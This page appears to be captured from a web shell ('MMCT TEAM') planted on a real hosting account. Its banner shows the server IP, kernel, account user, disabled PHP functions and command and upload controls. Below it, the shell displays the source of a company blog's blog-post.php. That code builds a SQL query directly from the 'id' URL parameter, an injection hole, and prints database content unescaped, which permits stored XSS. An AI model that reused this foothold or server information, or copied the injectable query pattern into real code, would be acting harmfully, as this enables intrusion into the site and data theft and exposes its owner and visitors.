MMCT TEAM
Server IP : 2a02:4780:11:767:0:2c41:85d9:6  /  Your IP : 216.73.217.25
Web Server : LiteSpeed
System : Linux in-mum-web667.main-hosting.eu 5.14.0-570.62.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Nov 11 10:10:59 EST 2025 x86_64
User : u742491609 ( 742491609)
PHP Version : 8.1.34
Disable Function : system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : OFF  |  Python : OFF
Directory (0755) :  /home/u742491609/domains/../.cagefs/../.filebrowser/../public_html/

[  Home  ][  C0mmand  ][  Upload File  ]

Current File : /home/u742491609/domains/../.cagefs/../.filebrowser/../public_html/blog-post.php
 <!DOCTYPE html>
<html class="no-js" lang="en">
    <head>
        <meta charset="utf-8">
        <meta name="description" content="Software Development, Web Solutions, Digital Marketing –Redback">
        <meta name="keywords" content="Redback- We are one of the professional Website Design and Development Company located in USA, offers Website Design, Web Development, Software Solution, Ecommerce Web development, Infrastructure Solution, Brand Marketing, Digital Marketing services &amp; more.">
        <meta name="author" content="Redback">
        <meta name="viewport" content="width=device-width, initial-scale=1.0">

        <title>Redback </title>

        <!-- BEGIN: CSS -->
        <link rel="stylesheet" href="css/bootstrap.css">
        <link rel="stylesheet" href="css/animate.css">
        <link rel="stylesheet" href="css/fontawesome-all.css">
        <link rel="stylesheet" href="css/orbito-icons.css">
        <link rel="stylesheet" href="css/orientate-font.css">
        <link rel="stylesheet" href="css/owl.theme.default.min.css">
        <link rel="stylesheet" href="css/owl.carousel.min.css">
        <link rel="stylesheet" href="css/lightslider.css">
        <link rel="stylesheet" href="css/lightcase.css">
        <link rel="stylesheet" href="css/settings.css">
        <link rel="stylesheet" href="css/ignore_for_wp.css">
        <link rel="stylesheet" href="css/preset.css">
        <link rel="stylesheet" href="css/theme.css">
        <link rel="stylesheet" href="css/responsive.css">
        <!-- END: CSS -->

        <!-- BEGIN: Favicon Icon -->
        <link rel="icon"  type="image/png" href="images/fav.png"> 
        <!-- END: Favicon Icon -->
    </head>
<?php include 'header.php'?>
 <?php
include('config.php');
if(isset($_GET['id'])){
    $sql="SELECT * FROM blog WHERE id=" .$_GET['id'];
    $result=mysqli_query($con,$sql);
    $row=mysqli_fetch_array($result);
   
    
}                          
$dt=$row['date'];
$yrdata= strtotime( $dt);
                                //   echo date('M-Y', $yrdata); 
                        
?>
        <!-- BEGIN: Page Banner Section -->
        <section class="pageBanner blogSingleBanner pbBG10" id="scene_1" style="background-image: url('images/background/19197284-min.jpg');">
            <div class="pageBannerOverlay pboDark4"></div>
            <div class="triangleShapes layer_items" data-depth="0.9"><img src="images/shapes/21.png" alt="Redback Banner Shapes"/></div>
            <div class="pageBannerContainer">
                <div class="container">
                    <div class="row">
                        <div class="col-lg-12">
                            <div class="pageBannerContent">
                                <div class="pageBannerContentInner">
                                    <h2><?php echo $row['title'];?></h2>
                                    <div class="orbitoBredcrumbs">
                                        <a href="index.php">Home</a><i>></i>Blog
                                    </div>
                                </div>
                                <div class="pageBannerShape01"><img src="images/shapes/18.png" alt="Redback Banner Shapes"/></div>
                                <div class="pageBannerShape02"><img src="images/shapes/19.png" alt="Redback Banner Shapes"/></div>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
            <div class="pageBannerShape03"><img src="images/shapes/20.png" alt="Redback Banner Shapes"/></div>
        </section>
        <!-- END: Page Banner Section -->

        <!-- BEGIN: Blog Details Page Section -->
        <section class="blogDetailsPageSection">
            <div class="container">
                <div class="row">
                    <div class="col-xl-8 col-lg-7">
                        <div class="blogDetailsThumb">
                            <img src="admin/<?php echo $row['image'];?>" alt="Blog Details"/>
                        </div>
                        <div class="blogDetailsArea">
                            <div class="bi01Meta">
                               
                                <span><i class="fa-solid fa-clock"></i>&nbsp;&nbsp;<?php echo date('M', $yrdata);?> <?php echo date('d Y', $yrdata);?></span>
                                <span><i class="fa-solid fa-user"></i>&nbsp;&nbsp;Admin</span>
                               
                            </div>
                            <h2 class="blogHeading"><?php echo $row['title'];?></h2>
                             <?php echo html_entity_decode($row['desciption']); ?>
                           
                            <div class="clearfix"></div>
                         
                        </div>
                  
              
                    </div>
                   <?php include'side.php'?>
                </div>
            </div>
        </section>
        <!-- END: Blog Details Page Section -->

        <!-- BEGIN: CTA Section -->
        <section class="ctaSection">
            <div class="container">
                <div class="row">
                    <div class="col-lg-9 col-md-9">
                        <div class="ctaLeft">
                            <h3 class="secSubTitle text-uppercase">We Love What We do</h3>
                            <h2 class="secTitle stWhite">Let’s Create Something Together</h2>
                            <p class="secDesc">Pure dolor in reprehenderit in voluptate velit essm dolore eu fugiat </p>
                        </div>
                    </div>
                    <div class="col-lg-3  col-md-3">
                        <div class="ctaRight justify-content-end">
                            <a class="orbBtn01 hoverBlue" href="contact.html">
                                <span class="bp-shape"></span>
                                <span class="bp-shape"></span>
                                <span class="bp-shape"></span>
                                <span class="bp-shape"></span>
                                <span class="bp-text">Contact Us</span>
                            </a>
                        </div>
                    </div>
                </div>
                <div class="row">
                    <div class="col-lg-12">
                        <div class="ctaBorder"></div>
                    </div>
                </div>
            </div>
        </section>
        <!-- END: CTA Section -->
<?php include 'footer.php'?>

MMCT - 2023